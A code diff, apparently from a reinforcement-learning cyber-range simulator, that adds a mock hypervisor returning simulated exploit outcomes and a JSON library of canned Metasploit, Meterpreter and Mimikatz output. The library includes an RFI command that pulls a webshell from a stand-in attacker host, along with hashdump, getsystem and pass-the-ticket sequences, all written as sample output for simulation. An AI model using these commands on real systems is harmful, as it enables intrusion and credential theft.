+ Override in concrete drivers to perform live connectivity checks.
+ """
+ return True
diff --git a/netforge_rl/sim2real/mock_hypervisor.py b/netforge_rl/sim2real/mock_hypervisor.py
new file mode 100644
index 0000000..297433f
--- /dev/null
+++ b/netforge_rl/sim2real/mock_hypervisor.py
@@ -0,0 +1,131 @@
+"""
+MockHypervisor — zero-dependency training fallback.
+
+Returns realistic Metasploit/Meterpreter stdout strings sampled from
+the curated payload_library.json without requiring Docker or network access.
+Gaussian jitter is applied to latency_ms to simulate real network variance.
+"""
+
+from __future__ import annotations
+
+import json
+import random
+import time
+from pathlib import Path
+
+from netforge_rl.sim2real.hypervisor_base import BaseHypervisor, HypervisorResult
+
+# CVE → approximate real-world base success probability.
+# Tuned so that an unpatched target with the right service has ~65-80% chance,
+# while a patched or wrong-OS target is much lower.
+_DEFAULT_SUCCESS_RATES: dict[str, float] = {
+ 'ExploitEternalBlue': 0.72,
+ 'ExploitBlueKeep': 0.58,
+ 'ExploitHTTP_RFI': 0.65,
+ 'ExploitRemoteService': 0.55,
+ 'PrivilegeEscalate': 0.70,
+ 'DumpLSASS': 0.80,
+ 'PassTheTicket': 0.90,
+}
+
+_OS_PENALTY: dict[str, float] = {
+ # Reduce success chance if OS doesn't match the expected target profile
+ 'Linux_Ubuntu': {'ExploitEternalBlue': -0.60, 'ExploitBlueKeep': -0.70},
+ 'Linux_CentOS': {'ExploitEternalBlue': -0.60, 'ExploitBlueKeep': -0.70},
+ 'PLC_Firmware': {
+ 'ExploitEternalBlue': -0.90,
+ 'ExploitBlueKeep': -0.90,
+ 'ExploitHTTP_RFI': -0.90,
+ },
+}
+
+# Realistic latency distributions (mean_ms, std_ms) per action
+_LATENCY_PROFILE: dict[str, tuple[float, float]] = {
+ 'ExploitEternalBlue': (4200.0, 800.0),
+ 'ExploitBlueKeep': (3800.0, 600.0),
+ 'ExploitHTTP_RFI': (1200.0, 300.0),
+ 'ExploitRemoteService': (2500.0, 500.0),
+ 'PrivilegeEscalate': (1800.0, 400.0),
+ 'DumpLSASS': (900.0, 200.0),
+ 'PassTheTicket': (600.0, 150.0),
+}
+_DEFAULT_LATENCY = (2000.0, 600.0)
+
+
+class MockHypervisor(BaseHypervisor):
+ """
+ Zero-dependency mock hypervisor for training-speed execution.
+
+ Uses a curated JSON library of authentic Metasploit stdout strings and
+ models probabilistic success rates adjusted for target OS compatibility.
+ No containers are spawned; all results are synthesised locally.
+ """
+
+ def __init__(self, seed: int | None = None):
+ self._rng = random.Random(seed)
+ library_path = Path(__file__).parent / 'payload_library.json'
+ with open(library_path) as f:
+ self._library: dict = json.load(f)
+
+ def dispatch(
+ self,
+ action_name: str,
+ target_ip: str,
+ target_os: str,
+ ) -> HypervisorResult:
+ """Synthesise a realistic payload result without spawning containers."""
+ t_start = time.perf_counter()
+
+ success = self._roll_success(action_name, target_os)
+ stdout = self._sample_stdout(action_name, success, target_ip)
+ return_code = 0 if success else 1
+
+ mean, std = _LATENCY_PROFILE.get(action_name, _DEFAULT_LATENCY)
+ latency_ms = max(50.0, self._rng.gauss(mean, std))
+
+ # Honour the real perf_counter so callers get a realistic wall-clock
+ elapsed_ms = (time.perf_counter() - t_start) * 1000
+ latency_ms = max(latency_ms, elapsed_ms)
+
+ return HypervisorResult(
+ success=success,
+ stdout=stdout,
+ return_code=return_code,
+ latency_ms=round(latency_ms, 1),
+ action_name=action_name,
+ target_ip=target_ip,
+ target_os=target_os,
+ container_id='mock',
+ )
+
+ def teardown_all(self) -> None:
+ """No-op — mock creates no resources to destroy."""
+ pass
+
+ def is_available(self) -> bool:
+ return True
+
+ def _roll_success(self, action_name: str, target_os: str) -> bool:
+ base_rate = _DEFAULT_SUCCESS_RATES.get(action_name, 0.50)
+ penalty = _OS_PENALTY.get(target_os, {}).get(action_name, 0.0)
+ adjusted = max(0.02, min(0.98, base_rate + penalty))
+ return self._rng.random() < adjusted
+
+ def _sample_stdout(self, action_name: str, success: bool, target_ip: str) -> str:
+ bucket = self._library.get(action_name)
+ if bucket is None:
+ # Fallback for actions not explicitly in the library
+ if success:
+ return f'[*] {action_name} succeeded against {target_ip}\n[*] Session opened.'
+ return (
+ f'[-] {action_name} failed against {target_ip}\n[-] No session created.'
+ )
+
+ key = 'success' if success else 'failure'
+ samples = bucket.get(key, [])
+ if not samples:
+ return f'[*] {action_name} {"completed" if success else "failed"}.'
+
+ template = self._rng.choice(samples)
+ # Inject actual target IP for realism
+ return template.replace('10.0.1.3', target_ip).replace('10.0.0.7', target_ip)
diff --git a/netforge_rl/sim2real/payload_library.json b/netforge_rl/sim2real/payload_library.json
new file mode 100644
index 0000000..74de265
--- /dev/null
+++ b/netforge_rl/sim2real/payload_library.json
@@ -0,0 +1,73 @@
+{
+ "ExploitEternalBlue": {
+ "success": [
+ "[*] Started reverse TCP handler on 10.0.0.1:4444\n[*] 10.0.1.3:445 - Connecting to target for exploitation.\n[*] 10.0.1.3:445 - Sending all but last fragment of exploit packet\n[*] 10.0.1.3:445 - Starting non-paged pool grooming\n[+] 10.0.1.3:445 - Sending SMBv2 buffers\n[+] 10.0.1.3:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\n[*] 10.0.1.3:445 - Sending final SMBv2 buffers.\n[*] 10.0.1.3:445 - Sending last fragment of exploit packet!\n[*] 10.0.1.3:445 - Receiving response from exploit packet\n[+] 10.0.1.3:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!\n[*] 10.0.1.3:445 - Sending egg to corrupted connection.\n[*] 10.0.1.3:445 - Triggering free of corrupted buffer.\n[*] Sending stage (200262 bytes) to 10.0.1.3\n[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.1.3:1042)\nmeterpreter > getuid\nServer username: NT AUTHORITY\\SYSTEM",
+ "[*] Started reverse TCP handler on 10.0.0.1:4444\n[*] 10.0.0.7:445 - Sending all but last fragment of exploit packet\n[+] 10.0.0.7:445 - ETERNALBLUE overwrite completed successfully!\n[*] Sending stage (200774 bytes) to 10.0.0.7\n[*] Meterpreter session 2 opened -> 10.0.0.7:49217\nmeterpreter > sysinfo\nComputer: CORP-WORKSTATION-04\nOS: Windows 7 (6.1 Build 7601, Service Pack 1)\nMeterpreter: x64/windows"
+ ],
+ "failure": [
+ "[-] 10.0.1.5:445 - Exploit aborted due to failure: no-target: This module only works against vulnerable Windows 7 targets.\n[-] Exploit failed: Rex::ConnectionRefused.",
+ "[*] 10.0.1.2:445 - Connection timed out waiting for target...\n[-] Exploit failed [timed-out]: Rex::ConnectionTimeout\n[*] Exploit completed, but no session was created.",
+ "[*] Started reverse TCP handler\n[*] Sending all but last fragment of exploit packet\n[-] Failed to get a shell. The target may not be vulnerable.\n[*] Exploit completed, but no session was created."
+ ]
+ },
+ "ExploitBlueKeep": {
+ "success": [
+ "[*] Started reverse TCP handler on 0.0.0.0:4444\n[*] Running automatic check (disable AutoCheck to override)\n[+] The target is vulnerable.\n[*] 10.0.0.12:3389 - Using CHUNK grooming strategy. Size 250MB, target address 0xfffffa8028e00000, Channel count 1.\n[*] Sending memory grooming packets...\n[+] Triggering kernel UAF. Success!\n[*] Meterpreter session 3 opened (10.0.0.1:4444 -> 10.0.0.12:49845)\nmeterpreter > getuid\nServer username: NT AUTHORITY\\SYSTEM"
+ ],
+ "failure": [
+ "[*] Running automatic check...\n[-] The target is not exploitable. Windows RDP does not appear to be vulnerable.\n[-] Exploit aborted due to failure: not-vulnerable.",
+ "[*] Started reverse TCP handler\n[*] Triggering kernel UAF...\n[-] Exploit failed with unexpected BSOD. Host may have crashed.\n[*] No session was created."
+ ]
+ },
+ "ExploitHTTP_RFI": {
+ "success": [
+ "[*] Started reverse TCP handler on 0.0.0.0:4444\n[*] Sending stage to 10.0.1.4\n[*] Meterpreter session 4 opened (10.0.0.1:4444 -> 10.0.1.4:34512)\nmeterpreter > sysinfo\nComputer: webserver-prod\nOS: Linux Ubuntu 18.04\nMeterpreter: x86/linux",
+ "$ curl 'http://10.0.0.8/index.php?page=http://attacker.com/shell.txt'\n[+] RFI successful. Webshell active at /tmp/.cache/sess_x7k2\n[*] Upgrading to Meterpreter...\n[*] Meterpreter session 5 opened"
+ ],
+ "failure": [
+ "[*] Attempting RFI via GET parameter 'page'...\n[-] Server returned 403 Forbidden. Remote file inclusion blocked by WAF.",
+ "curl: (7) Failed to connect to 10.0.1.4 port 80: Connection refused\n[-] HTTP connection failed. Target service may be down."
+ ]
+ },
+ "ExploitRemoteService": {
+ "success": [
+ "[*] Started reverse TCP handler on 0.0.0.0:4444\n[*] Command shell session 6 opened (10.0.0.1:4444 -> 10.0.0.3:42001)\nshell> whoami\nwww-data\nshell> id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)",
+ "[*] Meterpreter session 7 opened\nmeterpreter > getuid\nServer username: apache\nmeterpreter > getpid\nCurrent pid: 14422"
+ ],
+ "failure": [
+ "[-] Exploit failed [unreachable]: Rex::ConnectionRefused connect(2) for '10.0.1.6' port 22",
+ "[*] Auxiliary module execution completed\n[-] No session created. Service returned unexpected banner.",
+ "FATAL: Remote host closed connection during handshake\n[-] Exploit failed with SSL error."
+ ]
+ },
+ "PrivilegeEscalate": {
+ "success": [
+ "meterpreter > getsystem\n...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).\nmeterpreter > getuid\nServer username: NT AUTHORITY\\SYSTEM",
+ "[*] Trying exploit/windows/local/ms16_032_secondary_logon_handle_privesc\n[+] Deleted C:\\Windows\\Temp\\bqeHmG.exe\n[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.\n[*] Meterpreter session upgraded to SYSTEM."
+ ],
+ "failure": [
+ "meterpreter > getsystem\n[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:\n[-] Named Pipe Impersonation (In Memory/Admin)\n[-] Named Pipe Impersonation (Dropper/Admin)\n[-] Token Duplication (In Memory/Admin)",
+ "[-] Exploit failed: The target does not appear to be vulnerable (patched)."
+ ]
+ },
+ "DumpLSASS": {
+ "success": [
+ "meterpreter > hashdump\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nkrbtgt:502:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::\njohn.doe:1001:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::\nsvc_backup:1104:aad3b435b51404eeaad3b435b51404ee:db0edd04aaac4506f7f36b027c3f8f83:::",
+ "[*] Executing Mimikatz...\nsekurlsa::logonpasswords\n\nAuthentication Id : 0 ; 248731\nSession : Interactive from 1\nUser Name : Administrator\nDomain : CORP\nLogon Server : DC01\nLogon Time : 3/31/2026 8:14:03 AM\nSID : S-1-5-21-3623811015-3361044348-30300820-500\n\t[00010000] CredentialKeys\n\t * NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0\n\t * SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709\n\t[00000003] Primary\n\t * Username : Administrator\n\t * Domain : CORP\n\t * NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0"
+ ],
+ "failure": [
+ "meterpreter > hashdump\n[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.\n[-] Failed to dump LSA secrets — EDR blocking memory reads on lsass.exe",
+ "[*] Attempting to dump credentials via Mimikatz...\n[-] ERROR kuhl_m_sekurlsa_acquireLSA -> LSA Protected mode detected. Cannot dump credentials."
+ ]
+ },
+ "PassTheTicket": {
+ "success": [
+ "[*] Kerberos session opened using TGT for CORP\\Administrator\n[*] Successfully imported ticket: Administrator@CORP\n[*] Lateral movement successful. Remote session established to 10.0.1.1:445.",
+ "mimikatz > kerberos::ptt ticket.kirbi\n\n* File: 'ticket.kirbi': OK\n\nkerberos::list\n[00000000] - 0x00000012 - aes256_hmac\n Start/End/MaxRenew: ...\n Server Name: krbtgt/CORP @ CORP\n Client Name: Administrator @ CORP\n Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable\n[+] Ticket successfully imported. Access granted."
+ ],
+ "failure": [
+ "mimikatz > kerberos::ptt ticket.kirbi\n[-] ERROR: Ticket not accepted by KDC (KRB5KDC_ERR_TGT_REVOKED). Keys may have been rotated.",
+ "[*] Attempting Pass-The-Ticket...\n[-] KDC_ERR_PREAUTH_REQUIRED — Ticket timestamp expired or keys rotated. Re-dump required."
+ ]
+ }
+}
diff --git a/netforge_rl/topologies/network_generator.py b/netforge_rl/topologies/network_generator.py
index 03f3010..f15170a 100644
--- a/netforge_rl/topologies/network_generator.py
+++ b/netforge_rl/topologies/network_generator.py
@@ -124,6 +124,12 @@ def _generate_procedural(self) -> GlobalNetworkState:
num_vulns = random.randint(0, min(2, len(potential_cves)))
host.vulnerabilities = random.sample(potential_cves, num_vulns)
+ # ZTNA System Requirements (Secure Zone lockdown)
+ if name == 'Secure':
+ host.system_tokens.append('Enterprise_Admin_Token')
+ elif name == 'Corporate':
+ host.system_tokens.append(f'Local_Admin_{name}')
+
# Designate Domain Controllers only in Corp or Secure Windows servers
if 'Windows' in chosen_os and name in ['Corporate', 'Secure']:
if random.random() < 0.3:
@@ -135,12 +141,16 @@ def _generate_procedural(self) -> GlobalNetworkState:
# Assure at least 1 Domain Controller exists
if domain_controllers:
- random.choice(domain_controllers).is_domain_controller = True
+ dc = random.choice(domain_controllers)
+ dc.is_domain_controller = True
+ dc.cached_credentials.append('Enterprise_Admin_Token')
else:
# Force upgrade a random Windows host
win_hosts = [h for h in active_hosts if 'Windows' in h.os]
if win_hosts:
- random.choice(win_hosts).is_domain_controller = True
+ dc = random.choice(win_hosts)
+ dc.is_domain_controller = True
+ dc.cached_credentials.append('Enterprise_Admin_Token')
# Fill strictly to 50 nodes for Neural Network shape constant
padding_needed = 50 - len(state.all_hosts)